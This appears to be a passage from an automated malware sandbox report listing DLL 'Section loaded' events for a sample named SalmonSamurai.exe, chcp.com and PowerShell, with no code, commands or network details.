Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: iconcodecservice.dllJump to behavior
Source: C:\Users\user\Desktop\SalmonSamurai.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mscms.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: symsrv.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: msmpeg2vdec.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mfperfhelper.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dxva2.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: msvproc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
